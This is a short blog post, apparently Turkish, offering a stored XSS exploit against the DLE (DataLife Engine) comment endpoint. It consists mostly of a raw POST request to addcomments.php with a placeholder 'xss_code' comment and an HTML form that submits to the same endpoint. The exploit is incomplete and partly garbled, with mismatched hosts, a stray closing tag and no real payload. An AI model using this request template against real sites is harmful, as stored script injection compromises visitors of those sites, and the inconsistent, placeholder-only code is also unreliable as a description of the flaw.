DLE Stored XSS Enjeksiyon

DLE Stored XSS Enjeksiyon


Translator


402 görüntülenme | 1 dakika, 7 saniye | 2019-12-20 | alicangonullu



DLE Stored XSS Injection
# Exploit Author : Ali Can Gönüllü
# Exploit Date : 16-12-2019
# Source : https://github.com/Resert/dle
# Exploit :
POST https://xss.com/engine/ajax/addcomments.php
Host: xss.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html, /; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1469
Origin: https://www.xss.org
Connection: keep-alive
Cookie: PHPSESSID=mhumqqrv70ju2hmpfr0qdflkb1
post_id=id&comments=xss_code&name=name&mail=mail@mail.com&editor_mode=&skin=Red&sec_code=editting_plz&question_answer=&g_recaptcha_response=&allow_subscribe=0
<form action="https://xss.org/engine/ajax/addcomments.php" method="post">
<input type="text" name="post_id" value="id"><br>
<input type="text" name="comments" value="comment"><br>
<input type="hidden" name="editor_mode" value=""><br>
<input type="hidden" name="skin" value="Red"><br>
<input type="text" name="sec_code" value="edit"><br>
<input type="text" name="question_answer" value="edit"><br>
<input type="submit" value="Submit">
</font>
Show this code : Ex. quote.php?id=id

Etiketler

Bu sitede çerez verileriniz sitemizin hizmet kalitesini arttırma amacıyla işlenmek istenmektedir.


© Copyright 2020 Ali Can Gönüllü | Yasal